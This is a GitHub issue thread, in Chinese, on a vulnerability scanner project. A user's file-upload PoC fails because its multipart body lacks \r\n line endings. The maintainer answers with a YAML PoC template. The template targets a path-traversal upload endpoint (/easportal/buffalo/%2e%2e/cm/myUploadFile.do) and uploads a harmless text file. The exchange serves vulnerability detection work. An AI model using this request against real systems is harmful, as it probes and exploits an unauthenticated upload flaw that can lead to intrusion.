Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

文件上传的部分poc问题 #342

Closed
Zxc123456zxc opened this issue Apr 19, 2024 · 5 comments
Closed

文件上传的部分poc问题 #342

Zxc123456zxc opened this issue Apr 19, 2024 · 5 comments

Comments

@Zxc123456zxc
Copy link

网站是存在漏洞的,burp抓取的poc流量,文件上传不成功,发现是body的问题,手动替换body内容可以上传成功,通过对比数据包,发现是回车换行符的问题,这是成功上传的包,是有回车换行符号/r/n
image
这个是没有上传成功的包,只有换行符号/n,
image
通过测试替换数据包,发现是回车换行符的问题
@shadow1ng
Copy link
Owner

原来如此

@Zxc123456zxc
Copy link
Author

麻烦你了,能解决吗,大哥

@shadow1ng
Copy link
Owner

shadow1ng commented Apr 19, 2024
edited
Loading 

  name: test-upload
  rules:
    - method: POST
      path: /easportal/buffalo/%2e%2e/cm/myUploadFile.do
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
      body: "\
        ------WebKitFormBoundarySq4lDnabv8CwHfvx\r\n\
        Content-Disposition: form-data; name=\"myFile\"; filename=\"qcge.txt\"\r\n\
        Content-Type: text/html\r\n\
          \r\n\
          nicai\r\n\
          ------WebKitFormBoundarySq4lDnabv8CwHfvx--\r\n\
        "
      expression: |
        response.status == 200

image

@shadow1ng
Copy link
Owner

直接在poc里搜索\r\n会有例子

@Zxc123456zxc
Copy link
Author

好的,感谢大哥

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@shadow1ng @Zxc123456zxc